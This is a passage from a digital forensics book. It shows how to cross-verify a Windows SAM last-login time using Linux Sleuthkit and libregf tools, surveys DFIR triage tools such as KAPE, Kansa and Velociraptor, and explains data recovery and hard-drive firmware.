  • 204. Chapter 10 - Linux and Digital Forensics 197 For operating system artifacts, this same approach is found in other libraries like libevtx²³⁴ for Windows event logs, libregf²³⁵ for Windows registry hives, libscca²³⁶ for Windows prefetch files, and many others. These are all part of the libyal²³⁷ project. These are not the only application-level artifact tools and libraries out there, but they can give an idea of what is available. Tools on the Linux command line are, of course, not limited to computer storage media either. There are libraries and tools for mobile device analysis as well, such as libimobiledevice²³⁸ for iOS devices. Application data from mobile devices are often stored in SQL database files. The built-in database programs are included in many Linux distributions that can often extract desired data from chat apps, location-based artifacts, and more. So what does all this look like in use? ²³⁴https://github.com/libyal/libevtx ²³⁵https://github.com/libyal/libregf ²³⁶https://github.com/libyal/libscca ²³⁷https://github.com/libyal ²³⁸https://libimobiledevice.org/
  • 205. Chapter 10 - Linux and Digital Forensics 198 Sample Scenario: Define the Goal of the Examination An important part of every digital forensic analysis is defining the goal or at least the scope of your examination. Focusing on a goal helps us identify the tools required and the methods we should use. When we provide forensic support to other investigators, the goal of the examination is typically defined by the support request. In other cases, the elements of the crime or known indicators (in the case of network compromise) provide the goals. In this particular exercise, we will go back to our premise of cross verification. Covering every step in exact detail is outside the scope of this chapter. This is an illustration of what a simple cross- verification of results might look like. Let us assume we have the output from a Windows Forensic suite that shows a particular user last login date of a Windows workstation at a given time. This was done through the examination of the Security Account Manager (SAM) registry file. The specific time the user logged in is imperative to the case and we want to cross-verify the results. Our original output shows this: Username : johnnyFox [1000] Full Name : User Comment : Account Type : Default Admin User Account Created : Thu Apr 6 01:35:32 2017 Z Name : Password Hint : InitialsInCapsCountToFour Last Login Date : Sun Apr 30 21:23:09 2017 Z Pwd Reset Date : Thu Apr 6 01:35:34 2017 Z Pwd Fail Date : Sun Apr 30 21:23:01 2017 Z Login Count : 7 The goal for this examination is to verify the above Last Login Date with a separate tool under Linux (our cross verification).
  • 206. Chapter 10 - Linux and Digital Forensics 199 Sample Scenario: Acquire the Evidence In this scenario, we can assume the evidence has already been acquired. But for the sake of illustration, we will show the disk image being created from computer media attached to our Linux platform. Linux assigns a device node to attached media. In this case, the device node is /dev/sdb. The command lsblk will list all the block devices (storage media), attached to our system: $ lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS ... sdb 7:0 0 500M 1 disk -- sdb1 259:4 0 499M 1 part ... Once we’ve identified the device, we can image it with dd or preferably a more forensic-oriented version like dc3dd: $ sudo dc3dd if=/dev/sdb hof=image.raw hash=sha1 log=image.log This is a simple forensic image obtained with Linux using dc3dd on a subject disk. The input file (if) is /dev/sdb. The hashed output file (hof) is image.raw. The hash algorithm is SHA1 and we are writing a log file to image.log. The log file created above is viewable using the cat command to stream the text file to our terminal: $ cat image.log dc3dd 7.2.646 started at 2022-07-27 21:33:40 -0400 compiled options: command line: dc3dd if=/dev/sdb hof=image.raw hash=sha1 log=image.log device size: 1024000 sectors (probed), 524,288,000 bytes sector size: 512 bytes (probed) 524288000 bytes ( 500 M ) copied ( 100% ), 2 s, 237 M/s 524288000 bytes ( 500 M ) hashed ( 100% ), 1 s, 555 M/s input results for device `/dev/sdb': 1024000 sectors in 0 bad sectors replaced by zeros 094123df4792b18a1f0f64f1e2fc609028695f85 (sha1) output results for file `image.raw':
  • 207. Chapter 10 - Linux and Digital Forensics 200 1024000 sectors out [ok] 094123df4792b18a1f0f64f1e2fc609028695f85 (sha1) dc3dd completed at 2022-07-27 21:33:42 -0400 This shows us a log of the imaging process, the size of the data acquired, and the calculated hashes used to help document evidence integrity. We now have a verified image, obtained from the original storage device, that we can use for our examination.
  • 208. Chapter 10 - Linux and Digital Forensics 201 Sample Scenario: Map the Storage Volumes Once we have created our image, we need to determine the partitioning scheme, and which of those partitions are of interest to our investigation. $ mmls image.raw DOS Partition Table Offset Sector: 0 Units are in 512-byte sectors Slot Start End Length Description 000: Meta 0000000000 0000000000 0000000001 Primary Table (#0) 001: ------- 0000000000 0000002047 0000002048 Unallocated 002: 000:000 0000002048 0001023999 0001021952 NTFS / exFAT (0x07) Using the mmls command from the Sleuthkit, we can see that there is only one NTFS file system, at a sector offset of 2O48 (under Start). We will be using the additional file system and file extraction tools from TSK, and the sector offset is an important value. We use it to tell TSK which volume to access inside the image. Media storage partitioning can be quite complex, and with TSK we access each volume/file system separately.
  • 209. Chapter 10 - Linux and Digital Forensics 202 Sample Scenario: Identify the File System Our volume of interest has been identified at an offset inside the image of 2048 sectors. We pass this volume to the TSK tool fsstat to obtain detailed information on the file system: $ fsstat -o 2048 image.raw FILE SYSTEM INFORMATION -------------------------------------------- File System Type: NTFS Volume Serial Number: CAE0DFD2E0DFC2BD OEM Name: NTFS Volume Name: NTFS_2017d Version: Windows XP METADATA INFORMATION -------------------------------------------- First Cluster of MFT: 42581 First Cluster of MFT Mirror: 2 Size of MFT Entries: 1024 bytes Size of Index Records: 4096 bytes Range: 0 - 293 Root Directory: 5 CONTENT INFORMATION -------------------------------------------- Sector Size: 512 Cluster Size: 4096 Total Cluster Range: 0 - 127742 Total Sector Range: 0 - 1021950 $AttrDef Attribute Values: $STANDARD_INFORMATION (16) Size: 48-72 Flags: Resident $ATTRIBUTE_LIST (32) Size: No Limit Flags: Non-resident $FILE_NAME (48) Size: 68-578 Flags: Resident,Index $OBJECT_ID (64) Size: 0-256 Flags: Resident $SECURITY_DESCRIPTOR (80) Size: No Limit Flags: Non-resident $VOLUME_NAME (96) Size: 2-256 Flags: Resident $VOLUME_INFORMATION (112) Size: 12-12 Flags: Resident $DATA (128) Size: No Limit Flags: $INDEX_ROOT (144) Size: No Limit Flags: Resident $INDEX_ALLOCATION (160) Size: No Limit Flags: Non-resident $BITMAP (176) Size: No Limit Flags: Non-resident
  • 210. Chapter 10 - Linux and Digital Forensics 203 $REPARSE_POINT (192) Size: 0-16384 Flags: Non-resident $EA_INFORMATION (208) Size: 8-8 Flags: Resident $EA (224) Size: 0-65536 Flags: $LOGGED_UTILITY_STREAM (256) Size: 0-65536 Flags: Non-resident There is quite a bit of information in the fsstat output. File system type, version, and volume name are all items we will want to know for our notes. Other information provided by fsstat can be useful for documenting and describing files carved from this particular volume, as well as ranges of physical blocks used to store data.
  • 211. Chapter 10 - Linux and Digital Forensics 204 Sample Scenario: Identify the File(s) of Interest In this particular scenario, we are conducting a cross-verification of findings from a file we already know - the SAM registry file. In a normal Windows installation, the SAM is located in C:Windowssystem32config. We can use the Sleuthkit fls tool to recursively list all the allocated files in the volume of interest and specifically look, or grep, for Windows/System32/config/SAM: $ fls -Fr -o 2048 image.raw | grep -i system32/config/SAM r/r 178-128-2: Windows/System32/config/SAM This output gives us the NTFS file system’s Master File Table or MFT entry for the SAM file. In this case, the MFT entry is 178-128-2.
  • 212. Chapter 10 - Linux and Digital Forensics 205 Sample Scenario: Extract the data We will do two quick steps here. First, we will extract the file using the Sleuthkit’s icat command, which takes the meta-data entry (in this case MFT entry 178), and streams the contents of the data blocks or clusters to our chosen destination (in this case, an extracted file): $ icat -o 2048 image.raw 178 > image.SAM $ file image.SAM image.SAM: MS Windows registry file, NT/2000 or above The icat command extracts the SAM file and writes it to the file called image.SAM (arbitrarily named). Once this is done, we use the Linux file command to make sure that the file type we’ve extracted matches what we expect. In this case, we expected a Windows registry file, and that’s exactly what we have. At this point, we can install libregf. This will allow us to gather some simple identifying information as well as mount the registry file to allow us to parse it for the information we are seeking. The following commands are provided by the libregf package: $ regfinfo image.SAM regfinfo 20220131 Windows NT Registry File information: Version: 1.3 File type: Registry $ mkdir regfmnt $ regfmount image.SAM regfmnt/ regfmount 20220131 Using commands provided by libregf we confirm the identity and version of the registry file. Then we create a mount point or directory to which we can attach the registry file so we can browse the contents.
  • 213. Chapter 10 - Linux and Digital Forensics 206 Sample Scenario: Parse the Artifact Given the fact that we’ve already examined this file in our main forensic suite, and we are simply cross-verifying our results here, we would probably know the account’s Relative ID (RID) - in this case, the account’s RID is 1000. Now that we know the RID (from our previous examination - this is a cross verification), we can browse to the account’s associated keys in the mounted registry file: $ cd SAM/Domains/Account/Users/ $ ls (values)/ 000001F4/ 000001F5/ 000003E8/ 000003E9/ Names/ The directory SAM/Domains/Account/Users/ contains keys for each account, listed by RID in hex format. If you study Windows forensics, you know that we have a System Administrator (RID 500), a Guest account (RID 501), and user accounts starting at 1000 by default. We can confirm the account we are interested in is 000003E8 by converting each value to decimal using shell expansion and finding 1000: $ echo $((0x3E8)) 1000 Changing into that directory, we find several subkey values. Again, studying registry forensics, we find that the F value contains an account’s login information, so we change our directory to (values) for that account: $ cd 000003E8/(values) $ ls F UserPasswordHint V There are three values listed, including F.
  • 214. Chapter 10 - Linux and Digital Forensics 207 Sample Scenario: Cross Verify the Findings Using a hex viewer included with Linux (xxd), we can look at the subkey’s value. The Last Login Date is stored at hex offset 8. $ xxd F 00000000: 0200 0100 0000 0000 678E 5DF7 F7C1 D201 ........g.]..... 00000010: 0000 0000 0000 0000 20D7 BF15 76AE D201 ........ ...v... 00000020: FFFF FFFF FFFF FF7F 5CE9 5DF2 F7C1 D201 .........]..... 00000030: E803 0000 0102 0000 1402 0000 0000 0000 ................ 00000040: 0000 0700 0100 0000 0000 4876 488A 3600 ..........HvH.6. Hex offset 8 in the above output is on the first line: 678E 5DF7 F7C1 D201. There are a number of tools available to convert that hex string to a date value. We will use a simple python script (WinTime.py²³⁹). $ python ~/WinTime.py 678e5df7f7c1d201 Sun Apr 30 21:23:09 2017 Here again, is the original output from the analysis we are trying to verify (with some output removed for brevity): ... Last Login Date : **Sun Apr 30 21:23:09 2017 Z** ... So we can see that our original analysis, using a common digital forensics tool under Windows, has been cross verified with a completely separate set of tools under a different operating system. A far more detailed look at this level of analysis is covered in the aforementioned LinuxLEO guide. Note that we included the acquisition here for completeness, but in a real cross-verification situation, the image already acquired is fine to use - it has generally already been verified by hashing. We’ve actually accomplished a bit more by verifying our results with Linux. In addition to proving the veracity of what our original tool found, we have focused on a “smoking gun” artifact and manually extracted and parsed it ourselves. This entire manual process will go in your notes along with any research you needed to do in order to complete it (What registry file do I need? Where is the login data stored? What offset? What format?). Should you ever be called to testify or participate in any adjudication process, you will be better prepared to answer the opposition’s questions on how your original tool found what it reported. This same approach applies to the results of a mobile device analysis. In many mobile device analysis suites, chats are displayed in a GUI tool and organized by conversation. Find something important to ²³⁹https://linuxleo.com/Files/WinTime
  • 215. Chapter 10 - Linux and Digital Forensics 208 the investigation? Fire up a Linux command line and dig into the database yourself. In many cases, you don’t even need to leave your Windows forensic workstation desktop. You can use WSL/WSL2, or SSH into your physical Linux workstation or VM using PuTTY²⁴⁰. ²⁴⁰https://putty.org
  • 216. Chapter 10 - Linux and Digital Forensics 209 Closing While doing all this on the command line looks daunting, it is an excellent way to drill down to the “bits and bytes” and learn digital forensics from the ground up. There is no doubt that a full GUI suite of digital forensic tools can be a more efficient way of drilling into large amounts of data quickly. Where the Linux command line excels is in forcing you to learn exactly where you need to look for specific data and how it is stored. There are a growing number of ways to access a Linux environment without the need for excessive resources. Linux and its powerful tools are increasingly more accessible to forensic examiners and modern digital forensic laboratories.
  • 217. Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage By Guus Beckers²⁴¹ | LinkedIn²⁴² What is triage? While full disk analysis certainly has its place, triaging is an essential part of digital forensics. The purpose of triage is twofold, to cut down on the noise generated by the multitude of events on a host and to determine if deep-dive forensics is required. As time and computing power are precious resources, it is best not to waste them. Luckily, there are a couple of concepts and tools that can help an investigator out on any level of the investigation. What should be included in a triage? Before getting nitty gritty with tools let’s examine what’s useful to include within a triage while dealing with the majority of cases. If specific cases deal with investigating well known artifacts do not hesitate to add them to your list of triage items. It is advisable to collect multiple sources of evidence type to get a through understanding of the case at hand, sometimes evidence will not be available within all data structures due to the specific behavior of the operating system while at other times an adversary might have deleted one of the available sources. Without further ado, let’s take a look at the list: ²⁴¹http://discordapp.com/users/323054846431199232 ²⁴²https://www.linkedin.com/in/guusbeckers/
  • 218. Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 211 • A series of artifacts that keep track of locations of files on the disk or an file manager and any performed actions (renaming/deleting), this can be a $MFT or a list of locations that has been accessed. • Artifacts which track the history of included files within a folder. • Any hibernation or swap files that have been written to disk, these particular artifacts can extend your window into the past by days or even weeks. • Artifacts that indicate account usage, modification or deletion. • Artifacts that can clarify which applications have been installed or uninstalled at a particular date. • Artifacts which can be used to prove application execution in the past. • Artifacts which can track network or data transfer by a particular process. • Any available web browser history and a record of auxiliary actions such as initiated downloads. • Artifacts which track external events such as plugging in USB drives or/and other devices. • Any available event logs that have been maintained by the operating system or relevant applications. • Records of admin level activities on a system. These artifacts can be used for initial analysis while further processing of a case takes place. Forensic triage of one or a limited amount of hosts Historically, to examine a computer, an investigator would manually collect all artifacts and going through them one by one. You would need to know the artifact, go to the folder containing the artifact, export and repeat the process for any relevant artifact. To say this takes a lot of time investment is an understatement. A few years ago, KAPE was introduced to the forensic community. It is a standalone executable that contains a wealth of forensic knowledge on where artifacts live on a computer (knowledge you can extend by collaborating on the public GitHub). KAPE contains a set of definitions called Targets. A Target defines where a artifact lives on a system. Collecting it is as easy as ticking a checkbox. Targets can also contain other Targets. In this manner, KAPE offers various triage Targets, thereby allowing an investigator to perform triage of an entire host just by selecting a single Target. The Target collection can also be automated on endpoints by utilizing its command line counterpart. The second part of KAPE covers analysis through definitions called Modules. A Module can comb through data collected by a Target and transform it to a file format that’s easy to ingest in other tools. It does this by interacting with third-party tools that are part of a Module. Any executable that uses a command line is a viable option. As an example, KAPE comes with the entire suite of forensic parsers by Eric Zimmerman (for an entire list check here²⁴³), which cover the most popular Windows forensic artifacts. ²⁴³https://ericzimmerman.github.io/
  • 219. Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 212 Of particular note for triage is the KapeTriage Target²⁴⁴. The following description is provided at the time of writing: 1 KapeTriage collections will collect most of the files needed for a DFIR Investigatio 2 n. This Target pulls evidence from File System files, Registry Hives, Event Logs, Sc 3 heduled Tasks, Evidence of Execution, SRUM data, SUM data, Web Browser data (IE/Edge 4 , Chrome, Firefox, etc), LNK Files, Jump Lists, 3rd party remote access software log 5 s, antivirus logs, Windows 10 Timeline database, and $I Recycle Bin data files. The KapeTriage collection can be post-processed using the !EZParser Module²⁴⁵. These parsers, also written by Eric Zimmerman, can be used to extract information from the most common artifacts. Data will be made available in CSV format. These parsers (and other tools) can also be downloaded individually here²⁴⁶. Among the tools is Timeline Explorer, which is a utility that can open CSV files and has robust search and sorting options. A description and demonstration of Timeline Explorer is available at AboutDFIR²⁴⁷. KAPE can be used during live investigations but also after a forensic image has been created. A recommended tool to use with KAPE is Arsenal Image Mounter. Among its capabilities is read-only and write-protected image mounting. Just point KAPE at the assigned drive letter and it can perform collection and analysis. Utilizing KAPE, collection and transformation of artifacts is brought down to a matter of minutes. This allows an investigator to perform triage to determine if a deep-dive is required or perform triage while other forensic evidence is still processing. Another possibility when dealing with a single host is creating a custom content image using FTK Imager. You will be able to manually select the artifacts you want to collect using a graphical interface. Richard Davis covers this extensively in a video of his 13Cubed digital forensics YouTube series. It can be found here²⁴⁸. macOS and Linux Similar tools like KAPE also exist for other operating systems. One of the tools that deals exclusively with macOS (and its mobile counterparts iOS and iPadOS) is mac_apt²⁴⁹. It can extract a wealth of information from a macOS system and can deal with a variety of images and acquired data. mac_apt can be used exclusively on forensic images. Fortunately, there exists a live response counterpart. Named the Unix Artifact Collector²⁵⁰ (or UAC for short), it can acquire data from both macOS and a range of Linux distributions. Both tools are open-source and any contribution is welcomed. ²⁴⁴https://github.com/EricZimmerman/KapeFiles/blob/master/Targets/Compound/KapeTriage.tkape ²⁴⁵https://github.com/EricZimmerman/KapeFiles/blob/master/Modules/Compound/!EZParser.mkape ²⁴⁶https://ericzimmerman.github.io/#!index.md ²⁴⁷https://aboutdfir.com/toolsandartifacts/windows/timeline-explorer/ ²⁴⁸https://www.youtube.com/watch?v=43D18t7l7BI ²⁴⁹https://github.com/ydkhatri/mac_apt ²⁵⁰https://github.com/tclahr/uac
  • 220. Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 213 Scaling up to a medium-sized subnet The aforementioned tools work fantastically on a single host but how can we scale this to a subnet? The Kansa PowerShell IR Framework was created by Dave Hull to facilitate a growing need in the DFIR community, determining where deep-dive forensics should take place in ever-expanding networks. To do this, Kansa operates on two assumptions, malware needs to be present on the machine to perform its actions and malicious activity is relatively rare and therefore automatically stands out. To accomplish this Kansa is made up of two distinct components. The collection component is able to collect a number of lightweight artifacts including autostart locations, services, new admin users etc. The type of artifact is determined by a PowerShell script, each artifact uses its own script. These scripts are tied together with a Kansa master script. The master script is used to set which evidence needs to be collected. The Kansa scripts need to be executed on each server where evidence needs to be collected. To facilitate a secure transfer of credentials, it uses PowerShell remoting for this purpose. Kansa also integrates with third-party executables. Any required executable can automatically be pushed to the various servers. The second component is analysis with Kansa. These scripts stack the output of each gathered evidence item and counts the presence of each item. In this manner, outliers become more easily visible. A limitation of Kansa is that it uses persistent PowerShell connections until a script has been completed. For this reason, it is not recommended to use Kansa for more then 100 hosts. A distributed version of Kansa, developed by Jon Ketchum, addresses this limitation. The distributed version lifts many of the limitations of the original version. Persistent connections are no longer required. Larger data sets also require an optimized parsing method. For this reason the distributed version of Kansa uses an ElasticSearch backend. You’re encouraged to check out the original²⁵¹ talk. macOS and Linux don’t have similar tools but this shouldn’t necessarily be be a problem. Both operating systems have a long history of text manipulation tools like awk, grep and uniq. Depending on the retrieved information, a combination of these tools can be used to achieve the same results. Scaling up to an entire network Individual hosts and small networks are discussed, what are the options when you deal with a massive network? A single tool can be used in that instance. Velociraptor is another additon to the open-source DFIR arsenal. Upon its arrival in 2018 it quickly gathered a following and it isn’t difficult to see why. Velociraptor is one of the most powerful tools in the DFIR community. For starters, it supports all the major operating systems, Windows, macOS and Linux alike. What makes Velociraptor stand out is its distributed computing model along with a client/server approach. ²⁵¹https://www.youtube.com/watch?v=ZyTbqpc7H-M
  • 221. Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 214 A Velociraptor instance consists of a server and a number of clients distrubuted through a (client) network. The agent creates a persistent connection to the server. Analysts can use Velociraptor to: • Retrieve any file on a connected endpoint in a forensically sound manner • Retrieve forensic artifacts from all connected endpoints with the push of a button • Scan for IOCs utlizing both regex and YARA rules • Push and utilize third-party command line tools on all hosts running an agent It is not possible to do Velociraptor justice within a short section of this chapter. Rather then describe it, it is advised to see the tool in action. Eric Capuano recently gave a rundown²⁵² on Velociraptor using a small network. Furthermore, Michael Cohen also developed his own tutorial series which is currently available free of charge on this link²⁵³. Other tools A number of other triage tools aren’t discussed in depth but are still quite useful while performing triage. They can either be used on a standalone basis or pushed by Velociraptor. Be aware that these tools might set off AV due to their included malware signatures. • Autoruns²⁵⁴ or its CLI version Autorunsc, useful for enumerating all ASEP locations on a host • DeepBlueCLI²⁵⁵, a tool which enables threat hunting using the Windows Event logs • Chainsaw²⁵⁶, a similar tool which can group significant events • Loki²⁵⁷, an IOC/Yara scanner which can enumerate known malicious files on a host • Hayabusa²⁵⁸, an expansive threat hunting scanner which offers timelining capabilities Practicing triage Triage can be practiced on any number of forensic disk images. The following community images are included as recommendation: • DFIR Madness - The case of the stolen Szechuan sauce²⁵⁹ • Digital Corpora - 2012 National Gallery DC Scenario²⁶⁰ • Digital Corpora - 2019 Narcos Scenario²⁶¹ • Cyberdefenders - Pawned DC²⁶² ²⁵²https://www.youtube.com/watch?v=Q1IoGX--814 ²⁵³https://docs.velociraptor.app/training/ ²⁵⁴https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns ²⁵⁵https://github.com/sans-blue-team/DeepBlueCLI ²⁵⁶https://github.com/WithSecureLabs/chainsaw ²⁵⁷https://github.com/Neo23x0/Loki ²⁵⁸https://github.com/Yamato-Security/hayabusa ²⁵⁹https://dfirmadness.com/the-stolen-szechuan-sauce/ ²⁶⁰https://digitalcorpora.org/corpora/scenarios/national-gallery-dc-2012-attack/ ²⁶¹https://digitalcorpora.org/corpora/scenarios/2019-narcos/ ²⁶²https://cyberdefenders.org/blueteam-ctf-challenges/89
  • 222. Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 215 Contributions and sources Forensic triage, perhaps more than any other aspect of forensics relies on input of the entire community. Without the aid of the developers in this section, triage would surely be more difficult. • Eric Zimmerman for creating the variety of parsers and KAPE. • Andrew Rathbun for creating a multitude of KAPE Targets. • Yogesh Khatri for creating the mac_apt acquisition framework. • Thiago Lahr for his development of the Unix Artifact Collector. • Dave Hull for creating Kansa and Jon Ketchum for extending the original suite with Distribut- edKansa. • Michael Cohen for creating Velociraptor. • Eric Conrad for his work on DeepBlueCLI. • Nextron Systems for developing the Loki scanner. • WithSecure Labs for developing the Chainsaw EVTX scanner. • Yamato Security for creating the Hayabusa threat hunting scanner. Also information from the sources below was used in creating this chapter: • Richard Davis for creating the excellent 13Cubed YouTube series. • Eric Capuano for demoing the powerful capabilities of Velociraptor.
  • 223. Chapter 12 - Data recovery By Mark B.²⁶³ | Website²⁶⁴ | Instagram²⁶⁵ Types of data recovery When talking about data recovery, it is important to distinguish between: • Logical data recovery • Physical data recovery Both topics will be covered in this chapter. ²⁶³https://opensource-data-recovery-tools.com/ ²⁶⁴https://data-recovery-prague.com/ ²⁶⁵https://www.instagram.com/disk.doctor.prague/
  • 224. Chapter 12 - Data recovery 217 Logical data recovery This is the type of data recovery which is offered by most forensics-tools and a lot of specialized programs. A logical data recovery can mean: • to restore deleted files, • to deal with a damaged filesystem-catalogue or • to repair damaged files. As good as forensics tools are for conducting an investigation, most tools fall very short when handling corrupted filesystems. On the other side, there are really great logical recovery tools, including but not limited to: • R-Studio²⁶⁶ • UFS-Explorer²⁶⁷ • DMDE²⁶⁸ These tools are able to handle even the most severe damaged filesystems very well. The problem with forensics is the way such tools work. So-called data recovery programs analyse the whole drive and try to “puzzle” a filesystem together based on the data which was found. That means that such a generated virtual filesystem is the interpretation of the data by the tool. It would be very hard, and even impossible, in some cases to fully understand how the program got to the final result. As great as these tools are for recovering data and building a working folder-tree from corrupted filesystems, they may not be ideal for forensics as the processes which lead to the results are not always clear. ²⁶⁶https://r-studio.com ²⁶⁷https://www.ufsexplorer.com ²⁶⁸https://dmde.com
  • 225. Chapter 12 - Data recovery 218 Physical data recovery This category contains all kind of cases – for example: • unstable drives, • damaged PCBs (printed circuit boards), • firmware-issues, • head stuck on platters, • broken motors, • broken read-write-heads and even • damaged or dirty platters. In case of flash-memory like memory-cards, pendrives or SSDs there are just: • electronical problems and • firmware-issues, which made up the majority of the cases. So, first of all you need to come to a conclusion as to how far does it make sense to go with data recovery when conducting a forensics investigation. I have thought about that for quite some time and I think the most forensics investigators will not want to build a fully-fledged data recovery operation and start with cleanroom data recovery or dive very deep into firmware-repair. Generally speaking, most forensic investigators probably don’t want to outsource the imaging of a drive to a data recovery lab just because Windows will drop the drive after it become unstable. I guess many will also want to handle a PCB-swap without a data recovery lab. That is for sure an individual decision but going deeper into data recovery would need much more information than I could fit into one chapter. If you are interested in detailed introduction to professional data recovery, I would recommend you my book Getting started with professional data recovery²⁶⁹ (ISBN 979-8800488753). With the above-mentioned use cases in mind, we can have a look at the right tools to fit that need. These are my preference: • Guardonix²⁷⁰ • RapidSpar²⁷¹ • DeepSpar Disk Imager²⁷² ²⁶⁹https://www.amazon.com/dp/B09XBHFNXZ/ ²⁷⁰https://guardonix.com/ ²⁷¹https://rapidspar.com/ ²⁷²https://www.deepspar.com/products-ds-disk-imager.html
  • 226. Chapter 12 - Data recovery 219 The Guardonix is a quite powerful writeblocker which allow you to handle unstable drives by maintaining two independent connections - one to the PC which is maintained even when the drive is hanging or irresponsible and one to the drive itself. In this way the operating system is not aware of any issues the drive may have. With the professional edition of the tool the operator may even set a timeout to skip bad areas on the first pass. The RapidSpar is a highly automated solution for easier data recovery cases. It allows just for a basic level of control but it can handle even some firmware-cases automatically. The tool is mainly designed for PC repair shops to offer semi-professional data recovery services but with the data acquisition addon it would become a quite interesting tool for a forensics lab. Just a pity the tool lacks even the most basic forensic functions! It’s good to have that firmware-capabilities but RapidSpar is not documenting anything it does and so it’s absolutely a no-go for forensics. For entry-level data recovery operations this tool is a good choice but you may reach its limits quite fast because the tool supports basically no manual control. The DeepSpar Disk Imager, for short DDI, is a PCIe-card which can handle the cloning of highly unstable drives and this tool is the most professional data recovery tool but strictly limited to imaging. It is also ready for forensic imaging and it can calculate checksums on the fly. The DDI is also know in the data recovery industry for its great handling of unstable drives. The way a DDI reports errors is also great for diagnosis as the imaging progresses - errors are shown in the sector map as red letters. For example, an I means “sector ID not found” and if you just get reading errors with the letter I after a certain LBA the drive has most probably a translator issue (see firmware/error register). DeepSpar Disk Imager and RapidSpar have another advantage over the Guardonix/USB Stabilizer. These tools can build a headmap and ignore all sectors which belong to a defective head. This also allow you to identify bad heads and image good heads first which is safer.
  • 227. Chapter 12 - Data recovery 220 How to approach a data recovery case Before thinking about a data recovery attempt you would have to understand what is the cause of the issue and how to deal with it. This is very important because a wrong approach can damage drives. That’s why the first step is always the diagnosis! To properly diagnose an HDD, you need to understand the startup procedure, the firmware and the sounds a drive will make with certain issues. HDD start-up process Put simply, you can divide the boot process of the HDD into the following steps: 1. The data from the ROM chip is loaded and the engine is started. 2. If the motor rotates fast enough for an air cushion to form, the read/write head is moved from the parking position (inside the spindle or outside the platters on a ramp) onto the platters. 3. The first part of the firmware loaded from ROM contains the instructions on how the disk can load the remaining part of the firmware from the platters. This is located in an area on the platters, the so-called service area, which is not accessible by the user. 4. If the firmware could be fully loaded, the disk reports that it is ready for use. Knowing about this boot process can help us a lot in diagnosing problems. If a disk spins up, it most likely means that the ROM, MCU, RAM and motor control are OK and PCB damage can be ruled out with a high degree of probability. HDD firmware A hard drive isn’t just a dumb peripheral device, it’s a small computer with a processor, memory, and firmware that’s quite similar to an operating system. In the meantime, only 3 manufacturers, who have bought up many other competitors on their way, have prevailed in the market. Therefore, despite all the differences between the manufacturers, the firmware of hard drives follows a similar structure. The firmware is divided into different modules, which represent either data (G-List, P-List, S.M.A.R.T. data, …) or executable code. In general, the individual modules can be divided into the following categories: 1. The servo subsystem, which can be compareed to drivers on a PC. On the HDD, for example, it’s responsible for controlling and operating the head and the motor. The Servo-Adaptive Parameters (SAP) are there to correctly address these parts of the HDD. Damage in these modules can also result in the motor not running or the head making clicking noises. 2. The read/write subsystem provides the addressing (CHS, LBA, PBA, …). This category includes Zone-Table, G-List, P-List, … 3. The firmware core is responsible for ensuring that all modules and components work together and can therefore best be compared to an operating system kernel.
  • 228. Chapter 12 - Data recovery 221 4. The additional programs are very individual and depend on the model family and manufacturer, just like user software on a PC. These include, for example, self-test and low-level formatting programs. 5. The interface is responsible for communication via the SATA/PATA port and in some cases also for communication via the serial port that some hard drives provide. The higher layers build on the layers below. Therefore, the nature of a problem can already indicates at which level or levels you have to look. A small part of the firmware is present on the ROM chip or directly in the MCU (Micro Controller Unit). This part can be imagined as a mixture of BIOS and boot loader. It runs a self-test and then uses the head of the drive to load the rest of the firmware from the platters. We find the remaining parts of the firmware in the so-called service area (SA) on the platters. This is a special area on the platters that is not accessible to a normal user. Usually, there are at least two copies, which can then be read via head 0 and head 1. To access the service area you need special software like WD Marvel and Sediv or special hardware tools like PC-3000, MRT, DFL SRP or DFL URE (but URE is quite limited here). These are not tools that can be learned by trial and error. Any incorrect use of various options can damage the hard drive. If you try to repair a healthy module, there is a high chance that it will be damaged afterwards and if it is a critical module, the HDD will not start anymore. Also, the options offered vary depending on the vendor and model of the hard drive, so you can only perform certain actions on certain models. The learning curve of these tools is extremely steep and a lot depends on the tool used. Mastering a firmware tool takes a lot of practice and experience, which you build up over the years working with other DR technicians, attending training courses and conferences, and working with support on specific cases. So, this area of data recovery requires the greatest learning effort and the purchase of the most expensive tools represents only a very small part of the cases. Therefore, there are quite a few laboratories that only treat these firmware problems to a small extent themselves and outsource harder cases. MRT offers, for example, that their technicians solve firmware problems via remote sessions and charges $50 USD in case of a successful data recovery. DFL offers its customers up to 5 support requests per month for free, just like Ace Labs. The possible causes of firmware problems are just as varied as the solutions: • G-List or S.M.A.R.T. logs fill up or run into other modules (similar to a buffer overflow in RAM) and partially overwrite them. • The data of a module was written incompletely or is damaged due to other errors (e.g. failed sector). • The data in the ROM chip does not match the data in the service area. • The ROM chip is mechanically damaged or short-circuited. • etc.
